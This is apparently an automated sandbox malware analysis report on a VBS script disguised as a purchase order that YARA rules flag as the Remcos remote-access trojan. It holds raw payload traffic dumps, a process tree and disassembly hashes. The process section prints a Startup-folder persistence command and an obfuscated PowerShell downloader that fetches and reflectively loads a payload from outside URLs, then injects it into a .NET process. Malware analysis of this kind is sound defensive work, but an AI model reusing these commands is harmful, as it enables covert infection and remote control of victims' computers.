iMcIDGyQhMQIDDyggMEIDAAAAAACgBABwM4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0ygsMALDuyArMoKDoygpMQKDiyAoM4JDcygmMgJDWyAlMIJDQygjMwIDKyAiMYIDEyggMAED+xAfMoHD4xgdMQHDyxAcM4GDsxgaMgGDmxAZMIGDgxgXMwFDaxAWMYFDUxgUMAFDOxATMoEDIxgRMQEDCxAAM4DD8wgOMgDD2wANMIDDwwgLMwCDqw
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 4d 6b 4a 44 57 79 77 6b 4d 41 4a 44 4e 79 67 69 4d 63 49 44 45 79 51 51 4d 34 48 44 37 78 41 65 4d 51 48 44 78 78 67 62 4d 73 47 44 6f 78 51 5a 4d 49 47 44 66 78 41 58 4d 6b 46 44 57 78 77 55 4d 41 46 44 4e 78 67 53 4d 63 45 44 45 78 51 41 4d 34 44 44 37 77 41 4f 4d 55 44 44 79 77 77 4c 4d 77 43 44 70 77 67 4a 4d 4d 43 44 67 77 51 48 4d 6f 42 44 58 77 41 46 4d 45 42 44 4f 77 77 43 4d 67 41 44 46 77 67 41 41 41 4d 41 67 41 55 41 30 41 38 44 2f 2f 41 2f 50 6b 2f 44 32 2f 77 38 50 41 2f 44 74 2f 67 36 50 63 2b 44 6b 2f 51 34 50 34 39 44 62 2f 41 32 50 55 39 44 53 2f 77 7a 50 77 38 44 4a 2f 67 78 50 4d 38 44 41 2b 51 76 50 6f 37 44 33 2b 41 64 4e 6b 56 44 59 31 77 56 4e 59 4e 6a 39 7a 49 2f 4d 75 50 6a 36 41 41 41 41 4d 42 51 42 41 44 41 41 41 77 44 62 38 67 Data Ascii: MkJDWywkMAJDNygiMcIDEyQQM4HD7xAeMQHDxxgbMsGDoxQZMIGDfxAXMkFDWxwUMAFDNxgSMcEDExQAM4DD7wAOMUDDywwLMwCDpwgJMMCDgwQHMoBDXwAFMEBDOwwCMgADFwgAAAMAgAUA0A8D//A/Pk/D2/w8PA/Dt/g6Pc+Dk/Q4P49Db/A2PU9DS/wzPw8DJ/gxPM8DA+QvPo7D3+AdNkVDY1wVNYNj9zI/MuPj6AAAAMBQBADAAAwDb8g
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 49 44 44 77 77 67 4c 4d 77 43 44 71 77 41 4b 4d 59 43 44 6b 77 67 49 4d 41 43 44 65 77 41 48 4d 6f 42 44 59 77 67 46 4d 51 42 44 53 77 41 45 4d 34 41 44 4d 77 67 43 4d 67 41 44 47 77 41 42 4d 49 41 44 41 41 41 51 41 6f 42 51 42 41 43 77 50 34 2f 44 38 2f 67 2b 50 67 2f 44 32 2f 41 39 50 49 2f 44 77 2f 67 37 50 77 2b 44 71 2f 41 36 50 59 2b 44 6b 2f 67 34 50 41 2b 44 65 2f 41 33 50 6f 39 44 59 2f 67 31 50 51 39 44 53 2f 41 30 50 34 38 44 4d 2f 67 79 50 67 38 44 47 2f 41 78 50 49 38 44 41 2b 67 76 50 77 37 44 36 2b 41 75 50 59 37 44 30 2b 67 73 50 41 37 44 75 2b 41 72 50 6f 36 44 6f 2b 67 70 50 51 36 44 69 2b 41 6f 50 34 35 44 63 2b 67 6d 50 67 35 44 57 2b 51 6c 50 4d 35 44 52 2b 77 6a 50 30 34 44 4c 2b 51 69 50 63 34 44 46 2b 77 67 50 45 30 44 2f 39 51 66 Data Ascii: IDDwwgLMwCDqwAKMYCDkwgIMACDewAHMoBDYwgFMQBDSwAEM4ADMwgCMgADGwABMIADAAAQAoBQBACwP4/D8/g+Pg/D2/A9PI/Dw/g7Pw+Dq/A6PY+Dk/g4PA+De/A3Po9DY/g1PQ9DS/A0P48DM/gyPg8DG/AxPI8DA+gvPw7D6+AuPY7D0+gsPA7Du+ArPo6Do+gpPQ6Di+AoP45Dc+gmPg5DW+QlPM5DR+wjP04DL+QiPc4DF+wgPE0D/9Qf
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 56 44 56 31 41 56 4e 4d 56 44 53 31 51 55 4e 41 56 44 50 31 67 54 4e 30 55 44 4d 31 77 53 4e 6f 55 44 4a 31 41 53 4e 63 55 44 47 31 51 52 4e 51 55 44 44 31 67 51 4e 45 55 44 41 30 77 50 4e 34 54 44 39 30 41 50 4e 73 54 44 36 30 51 4f 4e 67 54 44 33 30 67 4e 4e 55 54 44 30 30 77 4d 4e 49 54 44 78 30 41 4d 4e 38 53 44 75 30 51 4c 4e 73 43 41 41 42 51 49 41 46 41 47 41 7a 49 30 4d 34 4d 6a 4c 7a 51 79 4d 61 4d 44 45 7a 59 67 4d 38 4c 6a 38 79 67 75 4d 65 4c 44 31 79 6f 73 4d 41 4c 6a 74 79 77 71 4d 69 4b 44 6d 79 34 6f 4d 45 4b 6a 65 79 41 6e 4d 6d 4a 44 58 79 49 6c 4d 49 4a 54 4f 79 38 69 4d 6c 49 7a 47 79 45 68 4d 48 45 54 2f 78 4d 66 4d 70 48 7a 33 78 55 64 4d 4c 48 54 77 78 63 62 4d 74 47 54 6d 78 38 59 4d 46 47 54 65 78 34 57 4d 6b 46 6a 57 78 41 56 4d Data Ascii: VDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEUDA0wPN4TD90APNsTD60QONgTD30gNNUTD00wMNITDx0AMN8SDu0QLNsCAABQIAFAGAzI0M4MjLzQyMaMDEzYgM8Lj8yguMeLD1yosMALjtywqMiKDmy4oMEKjeyAnMmJDXyIlMIJTOy8iMlIzGyEhMHET/xMfMpHz3xUdMLHTwxcbMtGTmx8YMFGTex4WMkFjWxAVM
2024-10-03 07:27:44 UTC	1059	IN	Data Raw: 54 75 33 41 67 4e 34 62 6a 36 32 6b 74 4e 4d 62 54 77 32 45 6f 4e 73 5a 44 57 32 77 6b 4e 44 55 7a 77 31 41 62 4e 4f 57 44 61 31 55 45 4e 38 54 7a 39 30 45 50 4e 73 54 6a 75 30 38 47 4e 49 52 44 46 7a 49 34 4d 76 4e 54 4f 7a 49 67 4d 4e 4c 44 78 79 59 72 4d 68 4b 54 63 79 6f 6c 4d 50 4a 7a 4f 79 41 6a 4d 72 49 6a 43 78 30 4e 41 41 41 41 6f 41 51 41 77 41 38 7a 79 2f 41 37 50 34 39 44 49 2f 41 78 50 47 34 54 2b 2b 38 75 50 67 37 6a 78 2b 38 72 50 34 36 54 73 2b 34 6e 50 70 35 44 5a 2b 4d 6c 50 4a 35 7a 4b 2b 38 51 50 39 33 7a 36 39 77 64 50 69 78 54 57 38 49 7a 4f 48 76 44 6f 36 73 50 4f 79 67 7a 45 33 55 36 4e 4b 5a 54 36 32 30 68 4e 51 59 44 43 31 73 4e 4e 6c 53 6a 59 30 45 45 4e 35 51 54 49 30 30 77 4d 41 4e 54 45 79 45 71 4d 57 4a 6a 54 78 49 64 4d 4c Data Ascii: Tu3AgN4bj62ktNMbTw2EoNsZDW2wkNDUzw1AbNOWDa1UEN8Tz90EPNsTju08GNIRDFzI4MvNTOzIgMNLDxyYrMhKTcyolMPJzOyAjMrIjCx0NAAAAoAQAwA8zy/A7P49DI/AxPG4T++8uPg7jx+8rP46Ts+4nPp5DZ+MlPJ5zK+8QP93z69wdPixTW8IzOHvDo6sPOygzE3U6NKZT620hNQYDC1sNNlSjY0EEN5QTI00wMANTEyEqMWJjTxIdML
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 37 30 30 30 0d 0a 53 32 49 6b 4e 39 59 44 47 32 38 51 4e 72 58 7a 34 31 51 61 4e 63 57 7a 57 31 41 46 4e 39 54 7a 39 30 41 4a 4e 49 53 6a 65 30 49 48 4e 70 52 44 59 30 67 46 4e 51 52 44 53 30 30 44 4e 72 51 7a 49 30 63 42 4e 50 51 6a 42 7a 30 2f 4d 31 50 54 37 7a 55 2b 4d 64 50 44 30 7a 51 38 4d 38 4f 6a 66 7a 49 31 4d 6d 49 7a 2f 79 6b 76 4d 7a 4c 54 37 79 55 75 4d 68 4c 6a 31 79 63 73 4d 37 4b 6a 71 79 34 70 4d 4d 4b 44 61 79 6b 6c 4d 4c 4a 54 4b 79 51 69 4d 66 49 7a 43 79 41 51 4d 72 48 6a 33 78 4d 64 4d 6b 47 6a 68 78 45 59 4d 38 46 54 63 78 55 56 4d 78 41 6a 2f 77 6b 50 4d 30 44 54 36 77 67 4c 4d 55 43 7a 6a 77 6f 49 4d 2f 42 7a 59 77 77 45 4d 78 41 44 4c 77 63 43 4d 63 41 44 41 41 41 51 41 45 41 41 42 67 42 77 50 77 2f 7a 7a 2f 6f 38 50 46 2f 6a 75 Data Ascii: 7000S2IkN9YDG28QNrXz41QaNcWzW1AFN9Tz90AJNISje0IHNpRDY0gFNQRDS00DNrQzI0cBNPQjBz0/M1PT7zU+MdPD0zQ8M8OjfzI1MmIz/ykvMzLT7yUuMhLj1ycsM7Kjqy4pMMKDayklMLJTKyQiMfIzCyAQMrHj3xMdMkGjhxEYM8FTcxUVMxAj/wkPM0DT6wgLMUCzjwoIM/BzYwwEMxADLwcCMcADAAAQAEAABgBwPw/zz/o8PF/ju
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 37 4f 63 70 6a 30 36 67 6f 4f 7a 70 54 47 35 59 4d 4f 35 65 7a 32 33 67 37 4e 49 61 7a 64 41 41 41 41 6f 41 77 41 77 44 41 41 41 38 54 34 37 6b 6b 4f 69 6d 6a 73 35 77 59 4f 76 68 54 75 34 30 4a 4f 45 68 6a 4b 78 73 65 4d 49 47 6a 4e 78 49 54 4d 75 45 6a 4b 78 59 53 4d 69 45 6a 48 78 6f 52 4d 57 45 6a 45 78 34 51 4d 4b 41 6a 37 41 41 41 41 38 41 77 41 67 44 67 50 7a 4d 54 49 7a 30 78 4d 5a 4d 54 46 7a 45 78 4d 4e 4d 54 43 7a 55 67 4d 35 4a 54 41 78 30 66 4d 35 48 54 39 78 45 66 4d 74 48 54 36 78 55 65 4d 63 42 54 35 77 45 4f 4d 64 44 54 32 77 55 4e 4d 52 44 54 7a 77 6b 4d 4d 30 41 41 41 41 41 45 41 44 41 4e 41 2f 30 37 50 35 2b 54 74 2f 45 37 50 74 2b 54 71 2f 55 36 50 68 2b 44 47 39 51 59 50 79 31 44 55 39 73 54 50 62 30 54 43 37 77 65 4e 72 4e 7a 37 79 Data Ascii: 7Ocpj06goOzpTG5YMO5ez23g7NIazdAAAAoAwAwDAAA8T47kkOimjs5wYOvhTu40JOEhjKxseMIGjNxITMuEjKxYSMiEjHxoRMWEjEx4QMKAj7AAAA8AwAgDgPzMTIz0xMZMTFzExMNMTCzUgM5JTAx0fM5HT9xEfMtHT6xUeMcBT5wEOMdDT2wUNMRDTzwkMM0AAAAAEADANA/07P5+Tt/E7Pt+Tq/U6Ph+DG9QYPy1DU9sTPb0TC7weNrNz7y
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 50 69 32 44 6e 39 63 5a 50 52 32 7a 69 39 55 59 50 41 32 6a 65 39 4d 58 50 75 31 54 61 39 4d 57 50 64 31 7a 56 39 49 56 50 4d 31 6a 52 39 41 55 50 37 30 54 4e 39 38 53 50 70 30 44 4a 39 34 52 50 59 30 6a 45 39 30 51 50 48 30 54 41 38 73 50 50 32 7a 44 38 38 6f 4f 50 6b 7a 7a 33 38 6b 4e 50 54 7a 54 7a 38 67 4d 50 43 7a 44 76 38 59 4c 50 78 79 7a 71 38 55 4b 50 66 79 6a 6d 38 51 4a 50 4f 79 44 69 38 4d 49 50 39 78 7a 64 38 45 48 50 73 78 6a 5a 38 41 47 50 61 78 54 56 38 38 45 50 4a 78 7a 51 38 34 44 50 34 77 6a 4d 38 77 43 50 6e 77 54 49 38 6f 42 50 54 77 54 44 37 67 71 4f 42 72 54 4e 35 45 66 4f 6b 6e 54 33 35 63 64 4f 52 6e 44 77 35 4d 61 4f 4f 6d 44 69 35 41 59 4f 72 6c 6a 58 35 49 56 4f 45 6c 7a 48 32 30 71 4e 6d 61 6a 6d 32 49 6f 4e 4b 55 6a 2f 31 6b Data Ascii: Pi2Dn9cZPR2zi9UYPA2je9MXPu1Ta9MWPd1zV9IVPM1jR9AUP70TN98SPp0DJ94RPY0jE90QPH0TA8sPP2zD88oOPkzz38kNPTzTz8gMPCzDv8YLPxyzq8UKPfyjm8QJPOyDi8MIP9xzd8EHPsxjZ8AGPaxTV88EPJxzQ84DP4wjM8wCPnwTI8oBPTwTD7gqOBrTN5EfOknT35cdORnDw5MaOOmDi5AYOrljX5IVOElzH20qNmajm2IoNKUj/1k

Target ID:	0
Start time:	03:27:25
Start date:	03/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs"
Imagebase:	0x7ff69dd80000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:27:26
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
Imagebase:	0x7ff6cbcd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:27:26
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:27:26
Start date:	03/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 127.0.0.1 -n 10
Imagebase:	0x7ff7e7b80000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:27:35
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:27:38
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:27:38
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:27:38
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:27:44
Start date:	03/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x2c0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:27:44
Start date:	03/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x4b0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2646574192.000000000262E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00007FF886C35158 Relevance: .7, Instructions: 726COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1478541322.00007FF886C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886c30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d98231eac0d4889c175d8998c3472fdda2f92f5c8914ccca3c655d0a3e805a5
Instruction ID: d73eec2d41df8ce5815c38f73728a79f2fe085043b1d0d6cbfa146278ff81729
Opcode Fuzzy Hash: 0d98231eac0d4889c175d8998c3472fdda2f92f5c8914ccca3c655d0a3e805a5
Instruction Fuzzy Hash: 32320630A1CA4A8FDB89DF1CC485AA977E2FF69350F54016ED44AC3296DA35FC42CB81

Function 00007FF886D024ED Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1478774793.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6696e0055e38139e5354a2e88b7b2f74c957bd65d45d46ff2ff9c7dbb4e4ac
Instruction ID: 30c49a4d0bc92c152d52152b0699633695e5654d65601fa12adfa5a7fbc0878c
Opcode Fuzzy Hash: 3e6696e0055e38139e5354a2e88b7b2f74c957bd65d45d46ff2ff9c7dbb4e4ac
Instruction Fuzzy Hash: 1EE15931D1EA8A8FE796AB6848566B5BFE0FF553A4F0401BED04EC70D3D9199C05C392

Function 00007FF886D02536 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1478774793.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2302c75b89a14663d1162510c96081d7d87e6c0319c6cf8966f5362bc45072b
Instruction ID: f5aebd20cf65c3b58dc285d8b15261da78b987bdb4e2386624f4f58294d2ae96
Opcode Fuzzy Hash: f2302c75b89a14663d1162510c96081d7d87e6c0319c6cf8966f5362bc45072b
Instruction Fuzzy Hash: D3A1E132D0FBC68FE79697684866275BFA0FF562A4B4801FAC04ECB0D3D91A9C45C352

Function 00007FF886C350E5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1478541322.00007FF886C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886c30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 0aaaabafa7d2cbae12382653d5b6be11f98a71ea2d7c0b987f9126ae23bf2361
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: C601A73011CB0D8FD744EF0CE051AA5B3E0FB85364F10052DE58AC3651D636E882CB42

Non-executed Functions

Function 00007FF886D03292 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1478774793.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a838cead0d7707df487256f5639a7404c3749a82dfc1b4c2c70c9b61bb573193
Instruction ID: 4f76654dfd72835ad7dd681a823dfa3ab2830ce76c68ba58ca07a63d47f23ee0
Opcode Fuzzy Hash: a838cead0d7707df487256f5639a7404c3749a82dfc1b4c2c70c9b61bb573193
Instruction Fuzzy Hash: F4E15C33D0DB8A4FE7969A2D58596B53BE1FF56360B4901BBC04EC7193ED19AC06C382

Analysis Process: powershell.exePID: 7964, Parent PID: 7640COMMON

Executed Functions

Function 00007FF886C437B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1654038074.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff886c40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: c0bbb1cfee07630656e25cb3e29ae5efe39fcbce9a968f6eb27d7cc3ca147627
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7D01677115CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3651D636E882CB46

Non-executed Functions

Function 00007FF886C4094D Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

xF, xrefs: 00007FF886C40989
I, xrefs: 00007FF886C409A5
%R^I, xrefs: 00007FF886C40974
QR^, xrefs: 00007FF886C409D4

Memory Dump Source

Source File: 00000006.00000002.1654038074.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff886c40000_powershell.jbxd

Similarity

API ID:
String ID: %R^I$I$QR^$xF
API String ID: 0-548359294
Opcode ID: 27c8b02e5d6d63e79c38a156dd8d43d6fab42be04755c2af0b880299b08ab279
Instruction ID: ada2ead1786aa4acd78971826a739d5f268131984b0b0ca8f8476b5f3946cd61
Opcode Fuzzy Hash: 27c8b02e5d6d63e79c38a156dd8d43d6fab42be04755c2af0b880299b08ab279
